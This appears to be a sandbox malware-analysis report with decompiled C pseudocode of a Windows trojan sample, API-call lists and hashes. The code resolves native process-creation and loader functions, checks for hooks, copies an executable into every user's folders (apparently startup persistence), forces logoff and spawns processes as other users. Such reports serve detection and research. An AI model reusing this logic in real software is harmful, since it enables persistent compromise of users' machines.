    												_t76 = CreateEventW(0x423b98, 1, _t86, _t86);
    												 *0x424028 =  *0x424028 | 0xffffffff;
    												 *0x424024 = _t76;
    												__eflags = _t76 - _t86;
    												if(_t76 == _t86) {
    													goto L26;
    												} else {
    													goto L33;
    												}
    											}
    										}
    									}
    								} else {
    									goto L26;
    								}
    							}
    						}
    					}
    				}
    				L46:
    				return _t43;
    			}









































    APIs
    • GetModuleHandleW.KERNEL32(00000000), ref: 0041C635
    • GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress), ref: 0041C70B
    • GetProcAddress.KERNEL32(00000000,NtCreateThread), ref: 0041C72A
    • GetProcAddress.KERNEL32(NtCreateUserProcess), ref: 0041C73C
    • GetProcAddress.KERNEL32(NtQueryInformationProcess), ref: 0041C74E
    • GetProcAddress.KERNEL32(RtlUserThreadStart), ref: 0041C760
    • GetProcAddress.KERNEL32(LdrLoadDll), ref: 0041C772
    • GetProcAddress.KERNEL32(LdrGetDllHandle), ref: 0041C784
    • HeapCreate.KERNELBASE(00000000,00080000,00000000), ref: 0041C7BD
    • GetProcessHeap.KERNEL32 ref: 0041C7CC
    • InitializeCriticalSection.KERNEL32(00422B2C), ref: 0041C7F9
    • WSAStartup.WS2_32(00000202,?), ref: 0041C80F
    • CreateEventW.KERNEL32(00423B98,00000001,00000000,00000000), ref: 0041C831
    • GetLengthSid.ADVAPI32(00000000,000000FF,00423B70), ref: 0041C866
    • GetCurrentProcessId.KERNEL32(?,?,00000000), ref: 0041C894
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp
    Similarity
    • API ID: AddressProc$CreateHandleHeapModuleProcess$CriticalCurrentEventInitializeLengthSectionStartup
    • String ID: GetProcAddress$LdrGetDllHandle$LdrLoadDll$LoadLibraryA$NtCreateThread$NtCreateUserProcess$NtQueryInformationProcess$RtlUserThreadStart
    • API String ID: 3091071419-305303173
    • Opcode ID: 2133b51c0e235ce9ba1cea9ed9d74ccb17859e0197277fa5d81991d81922fa61
    • Instruction ID: b2c51796385fbf768e9b44b559e88ae0f7ed46b93aafba8307846001f4aa9396
    • Opcode Fuzzy Hash: 2133b51c0e235ce9ba1cea9ed9d74ccb17859e0197277fa5d81991d81922fa61
    • Instruction Fuzzy Hash: 1E918CB5A40342DFCB20AF64DDC569A7BB0BB44306B54053FE555A32A2D77C9982CF0E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E004152ED(struct _SECURITY_DESCRIPTOR* __edi, intOrPtr* __esi) {
    				signed int _v8;
    				struct _ACL* _v12;
    				int _v16;
    				int _v20;
    				void** _t19;
    				struct _SECURITY_DESCRIPTOR* _t28;
    				intOrPtr* _t29;
    
    				_t29 = __esi;
    				_t28 = __edi;
    				if(InitializeSecurityDescriptor(__edi, 1) == 0 || SetSecurityDescriptorDacl(__edi, 1, 0, 0) == 0) {
    					return 0;
    				} else {
    					_t19 =  &_v8;
    					__imp__ConvertStringSecurityDescriptorToSecurityDescriptorW(L"S:(ML;;NRNWNX;;;LW)", 1, _t19, 0); // executed
    					if(_t19 == 0) {
    						L6:
    						_v8 = _v8 | 0xffffffff;
    						L7:
    						if(_t29 != 0) {
    							 *_t29 = 0xc;
    							 *(_t29 + 4) = _t28;
    							 *((intOrPtr*)(_t29 + 8)) = 0;
    						}
    						return _v8;
    					}
    					_v12 = 0;
    					if(GetSecurityDescriptorSacl(_v8,  &_v20,  &_v12,  &_v16) == 0 || SetSecurityDescriptorSacl(__edi, _v20, _v12, _v16) == 0) {
    						LocalFree(_v8);
    						goto L6;
    					} else {
    						goto L7;
    					}
    				}
    			}











    APIs
    • InitializeSecurityDescriptor.ADVAPI32(00423BA4,00000001,?,0041C81E), ref: 004152F7
    • SetSecurityDescriptorDacl.ADVAPI32(00423BA4,00000001,00000000,00000000), ref: 00415308
    • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 0041531E
    • GetSecurityDescriptorSacl.ADVAPI32(00000000,?,00000001,?), ref: 0041533A
    • SetSecurityDescriptorSacl.ADVAPI32(00423BA4,?,00000001,?), ref: 0041534E
    • LocalFree.KERNEL32(00000000), ref: 0041535B
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp
    Similarity
    • API ID: DescriptorSecurity$Sacl$ConvertDaclFreeInitializeLocalString
    • String ID: S:(ML;;NRNWNX;;;LW)
    • API String ID: 2050860296-820036962
    • Opcode ID: 50ea11f7b0f2eb67e295a6826d1274c58b1950548990b716017c72a80dbe77a4
    • Instruction ID: ab8ad52deedd3dd804a975406fb568378eaf73b5c7d40656954889c165e151e7
    • Opcode Fuzzy Hash: 50ea11f7b0f2eb67e295a6826d1274c58b1950548990b716017c72a80dbe77a4
    • Instruction Fuzzy Hash: C8112471A0060DFFDB219F95CD85AEFBBBCEB44740F14406AF561E21A0D7B59A809B14
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 53%
    			E004162A5() {
    				void* _t30;
    				void* _t33;
    				intOrPtr* _t35;
    				void* _t36;
    				void* _t39;
    				void* _t41;
    
    				_t39 = _t41 - 0x74;
    				_t17 = _t39 - 0x260;
    				 *((char*)(_t39 + 0x73)) = 0;
    				__imp__SHGetFolderPathW(0, 0x24, 0, 0, _t17, _t33, _t36, _t30); // executed
    				if(_t17 != 0) {
    					L8:
    					E00411DB1(_t17,  *((intOrPtr*)(_t39 + 0x7c)), 0, 0x10);
    				} else {
    					PathAddBackslashW(_t39 - 0x260);
    					_t35 = __imp__GetVolumeNameForVolumeMountPointW;
    					while(1) {
    						_t17 =  *_t35(_t39 - 0x260, _t39 - 0x58, 0x64); // executed
    						if(_t17 != 0) {
    							break;
    						}
    						PathRemoveBackslashW(_t39 - 0x260);
    						if(PathRemoveFileSpecW(_t39 - 0x260) == 0) {
    							goto L8;
    						} else {
    							PathAddBackslashW(_t39 - 0x260);
    							continue;
    						}
    						goto L9;
    					}
    					if( *((short*)(_t39 - 0x44)) != 0x7b) {
    						goto L8;
    					} else {
    						 *((short*)(_t39 + 8)) = 0;
    						_t17 = _t39 - 0x44;
    						__imp__CLSIDFromString(_t17,  *((intOrPtr*)(_t39 + 0x7c)));
    						if(_t17 != 0) {
    							goto L8;
    						} else {
    							 *((char*)(_t39 + 0x73)) = 1;
    						}
    					}
    				}
    				L9:
    				return  *((intOrPtr*)(_t39 + 0x73));
    			}










    APIs
    • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,00000000,0001FD30,?), ref: 004162C4
    • PathAddBackslashW.SHLWAPI(?), ref: 004162DB
    • PathRemoveBackslashW.SHLWAPI(?), ref: 004162EC
    • PathRemoveFileSpecW.SHLWAPI(?), ref: 004162F9
    • PathAddBackslashW.SHLWAPI(?), ref: 0041630A
    • GetVolumeNameForVolumeMountPointW.KERNELBASE(?,?,00000064), ref: 00416319
    • CLSIDFromString.OLE32(?,?), ref: 00416333
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: Path$Backslash$RemoveVolume$FileFolderFromMountNamePointSpecString
    • String ID:
    • API String ID: 613918483-0
    • Opcode ID: 3fb2763d953c3988d6f567b61eefd9735e28ef89b272e4f54adc5570e0da5ac7
    • Instruction ID: 2970f5f9581fa5cf9920b659afc982de0069e5886193073a68f92ad54e635baa
    • Opcode Fuzzy Hash: 3fb2763d953c3988d6f567b61eefd9735e28ef89b272e4f54adc5570e0da5ac7
    • Instruction Fuzzy Hash: CF11547190820CAADF209BB1DD88EDF77FCAB04344F140476FD15E3160E679DA889B68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			_entry_(void* __edx, void* __eflags, void* __fp0) {
    				char _v5;
    				int _v12;
    				char _v16;
    				char _v20;
    				void* _t22;
    				void* _t28;
    				char _t29;
    				char _t33;
    				signed int _t36;
    				void* _t51;
    
    				_t51 = __fp0;
    				_t34 = 0;
    				_t33 = 0; // executed
    				_t22 = E0041C5F3(0, __edx); // executed
    				if(_t22 == 0) {
    					L24:
    					__eflags = _t33;
    					_t21 = _t33 == 0;
    					__eflags = _t21;
    					ExitProcess(0 | _t21);
    				}
    				_v20 = 0;
    				_v16 = 1;
    				_v5 = 0;
    				SetErrorMode(0x8007);
    				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v12);
    				if(_t28 == 0) {
    					L19:
    					_t29 = E0041D21C(_t34, __eflags, _t51, _v20, _v16);
    					L20:
    					_t33 = _t29;
    					L21:
    					if(_t33 == 0 || ( *0x423b60 & 0x00000002) == 0) {
    						goto L24;
    					} else {
    						Sleep(0xffffffff);
    						return _t29;
    					}
    				}
    				_t36 = 0;
    				if(_v12 <= 0) {
    					L14:
    					LocalFree(_t28);
    					_t48 = _t33;
    					if(_t33 == 0) {
    						__eflags = _v5;
    						if(__eflags == 0) {
    							goto L19;
    						}
    						E0040BC0D(_t36);
    						_t29 = E00406E28();
    						__eflags =  *0x423b60 & 0x00000004;
    						_t33 = _t29;
    						if(( *0x423b60 & 0x00000004) != 0) {
    							_t29 = E0040BA86(0x422918, 0);
    						}
    						goto L21;
    					}
    					_t29 = E0041D030(_t48);
    					goto L20;
    				} else {
    					goto L3;
    				}
    				do {
    					L3:
    					_t34 =  *(_t28 + _t36 * 4);
    					if(_t34 != 0 &&  *_t34 == 0x2d) {
    						_t34 =  *(_t34 + 2) & 0x0000ffff;
    						if(_t34 == 0x66) {
    							_v20 = 1;
    						} else {
    							if(_t34 == 0x69) {
    								_t33 = 1;
    							} else {
    								if(_t34 == 0x6e) {
    									_v16 = 0;
    								} else {
    									if(_t34 == 0x76) {
    										_v5 = 1;
    									}
    								}
    							}
    						}
    					}
    					_t36 = _t36 + 1;
    				} while (_t36 < _v12);
    				goto L14;
    			}














    APIs
      • Part of subcall function 0041C5F3: GetModuleHandleW.KERNEL32(00000000), ref: 0041C635
      • Part of subcall function 0041C5F3: GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress), ref: 0041C70B
      • Part of subcall function 0041C5F3: GetProcAddress.KERNEL32(00000000,NtCreateThread), ref: 0041C72A
      • Part of subcall function 0041C5F3: GetProcAddress.KERNEL32(NtCreateUserProcess), ref: 0041C73C
      • Part of subcall function 0041C5F3: GetProcAddress.KERNEL32(NtQueryInformationProcess), ref: 0041C74E
      • Part of subcall function 0041C5F3: GetProcAddress.KERNEL32(RtlUserThreadStart), ref: 0041C760
      • Part of subcall function 0041C5F3: GetProcAddress.KERNEL32(LdrLoadDll), ref: 0041C772
      • Part of subcall function 0041C5F3: GetProcAddress.KERNEL32(LdrGetDllHandle), ref: 0041C784
    • SetErrorMode.KERNEL32(00008007), ref: 0041D549
    • GetCommandLineW.KERNEL32(?), ref: 0041D553
    • CommandLineToArgvW.SHELL32(00000000), ref: 0041D55A
    • LocalFree.KERNEL32(00000000), ref: 0041D5AF
    • Sleep.KERNEL32(000000FF,?,00000001), ref: 0041D605
    • ExitProcess.KERNEL32 ref: 0041D616
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: AddressProc$CommandHandleLineModule$ArgvErrorExitFreeLocalModeProcessSleep
    • String ID:
    • API String ID: 1184560534-0
    • Opcode ID: 608b5eafb51693992e70e4a2f6d922862ea64af791cd21e9ea49978d1dae7095
    • Instruction ID: db45d8f07fbc27e2cda46a034a07af96016d7186aec8b06fcefb0d1ce152b3a2
    • Opcode Fuzzy Hash: 608b5eafb51693992e70e4a2f6d922862ea64af791cd21e9ea49978d1dae7095
    • Instruction Fuzzy Hash: 1D21EAF0D4525579DF18ABB989183EE7F666F0230CF18809BD4416B292C77D85C5C71E
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    C-Code - Quality: 87%
    			E0041D21C(void* __ecx, void* __eflags, void* __fp0) {
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				void* _t74;
    				void* _t79;
    				intOrPtr* _t80;
    				void* _t82;
    				void* _t84;
    				void* _t88;
    				void* _t92;
    				int _t100;
    				int _t108;
    				void* _t113;
    				intOrPtr _t130;
    				void* _t145;
    				void* _t147;
    				void* _t152;
    				void* _t154;
    				void* _t170;
    
    				_t170 = __fp0;
    				_t136 = __ecx;
    				_t152 = _t154 - 0x70;
    				_t149 = _t152 + 0x50;
    				 *(_t152 + 0x6f) = 0;
    				if(E00416F1E(0, __ecx, _t152 + 0x50,  *0x423bbc) != 0) {
    					 *(_t152 + 0x68) =  *(_t152 + 0x54);
    					_t130 = E0041CE9A(_t152 + 0x68, __ecx,  *(_t152 + 0x50));
    					 *((intOrPtr*)(_t152 + 0x60)) = _t130;
    					if(_t130 == 0) {
    						 *(_t152 + 0x68) = 0;
    					}
    					E00416FC6(_t152 + 0x50);
    				}
    				if( *(_t152 + 0x68) != 0x1e6) {
    					__eflags =  *(_t152 + 0x68) - 0xc;
    					if( *(_t152 + 0x68) != 0xc) {
    						L41:
    						E00411CFE( *((intOrPtr*)(_t152 + 0x60)));
    						return  *(_t152 + 0x6f);
    					}
    					_t74 = E0041CA33(_t136, 0x8889347b, 2);
    					 *(_t152 + 0x5c) = _t74;
    					__eflags = _t74;
    					if(_t74 == 0) {
    						L39:
    						__eflags =  *(_t152 + 0x7c) - 1;
    						if( *(_t152 + 0x7c) == 1) {
    							E00413763(0, _t149,  *0x423bbc);
    						}
    						goto L41;
    					}
    					E0041C9FB(0x19367401, _t152 - 0x18, 1);
    					_t79 = E004154E1(_t152 - 0x18);
    					_t149 = GetFileAttributesExW;
    					__eflags = _t79;
    					if(_t79 == 0) {
    						L23:
    						_t80 =  *0x423b64;
    						__imp__IsWellKnownSid( *_t80, 0x16);
    						__eflags = _t80 - 1;
    						if(__eflags != 0) {
    							 *(_t152 + 0x6f) = 0;
    							_t82 = ReadProcessMemory(0xffffffff, _t149, _t152 + 0x6f, 1, 0);
    							__eflags = _t82;
    							if(_t82 == 0) {
    								L29:
    								_push( *((intOrPtr*)( *((intOrPtr*)(_t152 + 0x60)))));
    								_t84 = E00418123(_t136, E00410D21,  *((intOrPtr*)( *((intOrPtr*)(_t152 + 0x60)) + 8)));
    								_t149 = 0x423bc0;
    								 *(_t152 + 0x6f) = E00410D21(_t84, 0, 0x423bc0, _t152 - 0x294, E00410D21, 0x423bc0, __eflags, _t170);
    								L30:
    								__eflags =  *(_t152 + 0x6f) - 1;
    								if( *(_t152 + 0x6f) == 1) {
    									_t88 = E004135C5(_t152 - 0x294, 0, _t149, 0, _t152 + 0x4c);
    									__eflags = _t88;
    									 *(_t152 + 0x6f) = _t88 != 0;
    									__eflags =  *(_t152 + 0x6f);
    									if( *(_t152 + 0x6f) != 0) {
    										E0041C9FB(0x1a43533f, _t152 - 0x18, 1);
    										_t92 = CreateEventW(0x423b98, 1, 0, _t152 - 0x18);
    										_t145 =  *(_t152 + 0x4c);
    										 *(_t152 + 0x64) = _t92;
    										 *(_t152 + 0x68) = _t145;
    										_push(0xffffffff);
    										__eflags = _t92;
    										if(_t92 != 0) {
    											WaitForMultipleObjects(2, _t152 + 0x64, 0, ??);
    										} else {
    											WaitForSingleObject(_t145, ??);
    										}
    										_t149 = CloseHandle;
    										__eflags =  *(_t152 + 0x64);
    										if( *(_t152 + 0x64) != 0) {
    											CloseHandle( *(_t152 + 0x64));
    										}
    										CloseHandle( *(_t152 + 0x50));
    										CloseHandle(_t145);
    									}
    								}
    								L38:
    								E004154D1( *(_t152 + 0x5c));
    								goto L39;
    							}
    							__eflags =  *(_t152 + 0x6f) - 0xe9;
    							if( *(_t152 + 0x6f) != 0xe9) {
    								goto L29;
    							}
    							_t100 = GetFileAttributesExW(0x423fce, 0x78f16360, _t152 + 0x68);
    							__eflags = _t100 - 1;
    							if(_t100 != 1) {
    								goto L29;
    							}
    							_push( *((intOrPtr*)( *((intOrPtr*)(_t152 + 0x60)))));
    							E00418123(_t136, E0041108D,  *((intOrPtr*)( *((intOrPtr*)(_t152 + 0x60)) + 4)));
    							_push( *((intOrPtr*)(_t152 + 0x78)));
    							_t149 = 0x423bc0;
    							_push(_t152 - 0x294);
    							 *(_t152 + 0x6f) = E0041108D(_t152 - 0x294, 0,  *(_t152 + 0x68), 0x423bc0, E0041108D, 0x423bc0, __eflags);
    							VirtualFree( *(_t152 + 0x68), 0, 0x8000);
    							goto L30;
    						}
    						 *(_t152 + 0x6f) = E004113A5(__eflags);
    						goto L38;
    					} else {
    						goto L20;
    					}
    					while(1) {
    						L20:
    						 *(_t152 + 0x6f) = 0;
    						_t108 = ReadProcessMemory(0xffffffff, _t149, _t152 + 0x6f, 1, 0);
    						__eflags = _t108;
    						if(_t108 == 0) {
    							goto L22;
    						}
    						__eflags =  *(_t152 + 0x6f) - 0xe9;
    						if( *(_t152 + 0x6f) == 0xe9) {
    							goto L23;
    						}
    						L22:
    						Sleep(0x1f4);
    					}
    				}
    				if(E00410FD6( *((intOrPtr*)(_t152 + 0x60))) != 0) {
    					E0041C9FB(0x32901130, _t152 - 0x18, 1);
    					_t113 = CreateMutexW(0x423b98, 1, _t152 - 0x18);
    					 *(_t152 + 0x7c) = _t113;
    					if(_t113 != 0) {
    						if(GetLastError() == 0xb7) {
    							CloseHandle( *(_t152 + 0x7c));
    							 *(_t152 + 0x7c) = 0;
    						}
    						if( *(_t152 + 0x7c) != 0) {
    							E0040B22C(_t136, _t152 - 0x8c);
    							if(( *(_t152 - 0x8c) & 0x00000020) != 0) {
    								 *0x423b60 =  *0x423b60 | 0x00000010;
    							}
    							E0040647F();
    							if(( *0x423b60 & 0x00000010) != 0) {
    								ExitWindowsEx(0x14, 0x80000000);
    							}
    							E0041C9FB(0x1a43533f, _t152 - 0x18, 1);
    							_t147 = OpenEventW(2, 0, _t152 - 0x18);
    							if(_t147 != 0) {
    								SetEvent(_t147);
    								CloseHandle(_t147);
    							}
    							E0041CF57(1);
    							 *(_t152 + 0x6f) = 1;
    							CloseHandle( *(_t152 + 0x7c));
    						}
    					}
    				}
    				goto L41;
    			}
























    APIs
      • Part of subcall function 00416F1E: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,?,?,?,0041D23F,?,?,00000000), ref: 00416F43
      • Part of subcall function 00416F1E: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0041D23F,?,?,00000000), ref: 00416F56
    • CreateMutexW.KERNEL32(00423B98,00000001,?,32901130,?,00000001,?,?,?,00000000), ref: 0041D29E
    • GetLastError.KERNEL32(?,?,00000000), ref: 0041D2AF
    • CloseHandle.KERNEL32(00000001,?,?,00000000), ref: 0041D2C5
    • ExitWindowsEx.USER32(00000014,80000000), ref: 0041D304
    • OpenEventW.KERNEL32(00000002,00000000,?,1A43533F,?,00000001,?,?,?,00000000), ref: 0041D321
    • SetEvent.KERNEL32(00000000,?,?,00000000), ref: 0041D32E
    • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 0041D335
    • CloseHandle.KERNEL32(00000001,00000001,?,?,00000000), ref: 0041D345
    • ReadProcessMemory.KERNEL32(000000FF,73BCF9B0,?,00000001,00000000,?,19367401,?,00000001,8889347B,00000002,?,?,00000000), ref: 0041D3A3
    • Sleep.KERNEL32(000001F4,?,?,00000000), ref: 0041D3B4
    • IsWellKnownSid.ADVAPI32(?,00000016,?,19367401,?,00000001,8889347B,00000002,?,?,00000000), ref: 0041D3C5
    • ReadProcessMemory.KERNEL32(000000FF,73BCF9B0,?,00000001,00000000,?,?,00000000), ref: 0041D3EA
    • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,?,00000000), ref: 0041D442
    • GetFileAttributesExW.KERNEL32(00423FCE,78F16360,?,?,?,00000000), ref: 0041D404
      • Part of subcall function 00418123: VirtualProtect.KERNEL32(00410D21,?,00000040,00000000,73BCF9B0,?,?,0041D45C,?,?,?,?,00000000), ref: 00418138
      • Part of subcall function 00418123: VirtualProtect.KERNEL32(00410D21,?,00000000,00000000,?,?,0041D45C,?,?,?,?,00000000), ref: 0041816B
    • CreateEventW.KERNEL32(00423B98,00000001,00000000,?,1A43533F,?,00000001,?,?,00000000,00423BC0,00000000,?,?,?), ref: 0041D4B1
    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000), ref: 0041D4C7
    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000), ref: 0041D4D6
    • CloseHandle.KERNEL32(?,?,?,00000000), ref: 0041D4EA
    • CloseHandle.KERNEL32(?,?,?,00000000), ref: 0041D4EF
    • CloseHandle.KERNEL32(?,?,?,00000000), ref: 0041D4F2
    Memory Dump Source
    • Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp
    Similarity
    • API ID: CloseHandle$CreateEventFileVirtual$MemoryProcessProtectReadWait$AttributesErrorExitFreeKnownLastMultipleMutexObjectObjectsOpenSingleSizeSleepWellWindows
    • String ID:
    • API String ID: 561470431-0
    • Opcode ID: d849554906fc8518b7859a4076cb2f9e9e82454529ca5439cee87a8e213dfd44
    • Instruction ID: 327e05929bed2d9028adb7989d351d1932e4ad0a59857dc3bac0b92929e34b97
    • Opcode Fuzzy Hash: d849554906fc8518b7859a4076cb2f9e9e82454529ca5439cee87a8e213dfd44
    • Instruction Fuzzy Hash: FF9181B190025CEFDF21AFA48D85EEE3FA9AF04314F00006BFD15A21A2C7789985CB59
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 81%
    			E004113A5(void* __eflags) {
    				char _v5;
    				char* _v12;
    				char _v16;
    				int _v20;
    				int _v24;
    				int _v28;
    				int _v32;
    				char _v56;
    				char _v88;
    				char _v608;
    				short _v1128;
    				char _v1648;
    				void* __edi;
    				void* __esi;
    				_Unknown_base(*)()* _t63;
    				int _t69;
    				char _t70;
    				char _t76;
    				int _t80;
    				char _t81;
    				char _t82;
    				char _t86;
    				char _t88;
    				WCHAR* _t98;
    				int _t99;
    				CHAR* _t110;
    				char* _t111;
    				WCHAR* _t112;
    				struct HINSTANCE__* _t113;
    				signed int _t114;
    				void* _t115;
    
    				_t112 =  &_v56;
    				_v5 = 0;
    				E00419897(0xe1, _t112);
    				_t113 = LoadLibraryW(_t112);
    				if(_t113 == 0) {
    					L7:
    					return 0;
    				} else {
    					_t110 =  &_v88;
    					E00419861(0xe2, _t110);
    					_t63 = GetProcAddress(_t113, _t110);
    					if(_t63 != 0) {
    						_push( &_v12);
    						_t106 =  &_v608;
    						_push( &_v608);
    						_v12 = 0x104;
    						if( *_t63() == 1) {
    							_t98 =  &_v1128;
    							__imp__SHGetFolderPathW(0, 7, 0xffffffff, 1, _t98);
    							if(_t98 == 0) {
    								_t106 =  &_v608;
    								_t99 = E0041284D(_t106);
    								_v12 = _t99;
    								if(StrCmpNIW(_t106,  &_v1128, _t99) == 0) {
    									_t106 = _t115 + _v12 * 2 - 0x464;
    									E0041209F(_t102 | 0xffffffff, _t115 + _v12 * 2 - 0x464,  &_v1128);
    									_v5 = 1;
    								}
    							}
    						}
    					}
    					FreeLibrary(_t113);
    					if(_v5 != 0) {
    						_v5 = 0;
    						_v28 = 0;
    						_t111 = L".exe";
    						do {
    							_v12 = 0;
    							_t69 = NetUserEnum(0, 0, 2,  &_v12, 0xffffffff,  &_v20,  &_v32,  &_v28);
    							_v24 = _t69;
    							__eflags = _t69;
    							if(_t69 == 0) {
    								L11:
    								__eflags = _v12;
    								if(_v12 == 0) {
    									goto L24;
    								}
    								_t114 = 0;
    								__eflags = _v20;
    								if(_v20 <= 0) {
    									L23:
    									NetApiBufferFree(_v12);
    									goto L24;
    								} else {
    									goto L13;
    								}
    								do {
    									L13:
    									_t80 = NetUserGetInfo(0,  *(_v12 + _t114 * 4), 0x17,  &_v16);
    									__eflags = _t80;
    									if(_t80 == 0) {
    										_t81 = _v16;
    										__eflags = _t81;
    										if(_t81 != 0) {
    											_t106 =  &_v608;
    											_t82 = E0041D772( *((intOrPtr*)(_t81 + 0x10)),  &_v608);
    											__eflags = _t82;
    											if(_t82 != 0) {
    												_t86 = E00417593( &_v1128,  &_v608,  &_v608);
    												__eflags = _t86;
    												if(_t86 != 0) {
    													_t88 = E00417315( &_v608);
    													__eflags = _t88;
    													if(_t88 != 0) {
    														__eflags = E004161B2(0,  &_v608,  &_v1648, _t111, 6);
    														if(__eflags != 0) {
    															__eflags = E00410AEC( &_v608, __eflags, 0,  &_v1648, 0);
    															if(__eflags != 0) {
    																_v5 = 1;
    																E00410C19( &_v608, __eflags,  *((intOrPtr*)(_v16 + 0x10)),  &_v1648);
    															}
    														}
    													}
    												}
    											}
    											NetApiBufferFree(_v16);
    										}
    									}
    									_t114 = _t114 + 1;
    									__eflags = _t114 - _v20;
    								} while (_t114 < _v20);
    								goto L23;
    							}
    							__eflags = _t69 - 0xea;
    							if(_t69 != 0xea) {
    								break;
    							}
    							goto L11;
    							L24:
    							__eflags = _v24 - 0xea;
    						} while (_v24 == 0xea);
    						_t70 =  &_v1128;
    						__imp__SHGetFolderPathW(0, 0x8007, 0xffffffff, 1, _t70);
    						__eflags = _t70;
    						if(_t70 == 0) {
    							__eflags = E004161B2(0,  &_v1128,  &_v1648, _t111, 6);
    							if(__eflags != 0) {
    								_t76 = E00410AEC(_t106, __eflags, 0,  &_v1648, 0);
    								__eflags = _t76;
    								if(_t76 != 0) {
    									_v5 = 1;
    								}
    							}
    						}
    						return _v5;
    					}
    					goto L7;
    				}
    			}



































    APIs
    • LoadLibraryW.KERNEL32(?,73B75B60,73BCF9B0,00000000), ref: 004113C6
    • GetProcAddress.KERNEL32(00000000,?), ref: 004113E7
    • SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 00411418
    • StrCmpNIW.SHLWAPI(?,?,00000000), ref: 0041143B
    • FreeLibrary.KERNEL32(00000000), ref: 00411462
    • NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,0041D3D5,?,?), ref: 00411498
    • NetUserGetInfo.NETAPI32(00000000,?,00000017,?), ref: 004114D1
    • NetApiBufferFree.NETAPI32(?,?,?), ref: 0041156A
    • NetApiBufferFree.NETAPI32(?), ref: 0041157D
    • SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 004115A1
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp
    Similarity
    • API ID: Free$BufferFolderLibraryPathUser$AddressEnumInfoLoadProc
    • String ID: .exe
    • API String ID: 1753652487-4119554291
    • Opcode ID: d0212774bc16a396e6d4e0b9b8b91699891a353717a1e8bb99c1ac5279902fde
    • Instruction ID: 09dae47a09f6c5e9f5b3411b93845a48c799259748f8cad0d7c7aca3b55140e0
    • Opcode Fuzzy Hash: d0212774bc16a396e6d4e0b9b8b91699891a353717a1e8bb99c1ac5279902fde
    • Instruction Fuzzy Hash: FC617471900218BFDF10DB94CC85EEF77BDAB45344F0045AAF652F21A2E7399A89CB58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 58%
    			E00413620(void* _a4, WCHAR* _a8) {
    				WCHAR* _v5;
    				char _v12;
    				signed int _v16;
    				struct HINSTANCE__* _v20;
    				_Unknown_base(*)()* _v24;
    				struct _PROCESS_INFORMATION _v40;
    				struct _STARTUPINFOW _v108;
    				struct HINSTANCE__* _t28;
    				_Unknown_base(*)()* _t31;
    				WCHAR* _t49;
    				long _t50;
    				intOrPtr* _t52;
    
    				_v5 = 0;
    				_t28 = LoadLibraryA("userenv.dll");
    				_v20 = _t28;
    				if(_t28 != 0) {
    					_t52 = GetProcAddress(_t28, "CreateEnvironmentBlock");
    					_t31 = GetProcAddress(_v20, "DestroyEnvironmentBlock");
    					_v24 = _t31;
    					if(_t52 != 0 && _t31 != 0) {
    						_push(0);
    						_push(_a4);
    						_push( &_v16);
    						_v16 = 0;
    						if( *_t52() == 0) {
    							_v16 = 0;
    						}
    						_t50 = 0x44;
    						_v12 = 0;
    						E00411DB1( &_v108,  &_v108, 0, _t50);
    						_t49 = _a8;
    						_v108.cb = _t50;
    						_v108.lpDesktop = 0;
    						if(_t49 == 0) {
    							_t49 =  &_v12;
    						}
    						asm("sbb eax, eax");
    						if(CreateProcessAsUserW(_a4, 0, _t49, 0, 0, 0,  ~_v16 & 0x00000400 | 0x04000000, _v16, 0,  &_v108,  &_v40) != 0) {
    							CloseHandle(_v40.hThread);
    							CloseHandle(_v40);
    							_v5 = _v40.dwProcessId != 0;
    						}
    						if(_v16 != 0) {
    							_v24(_v16);
    						}
    					}
    					FreeLibrary(_v20);
    				}
    				return _v5 & 0x000000ff;
    			}
















    APIs
    • LoadLibraryA.KERNEL32(userenv.dll,00000000), ref: 00413631
    • GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 00413650
    • GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 0041365C
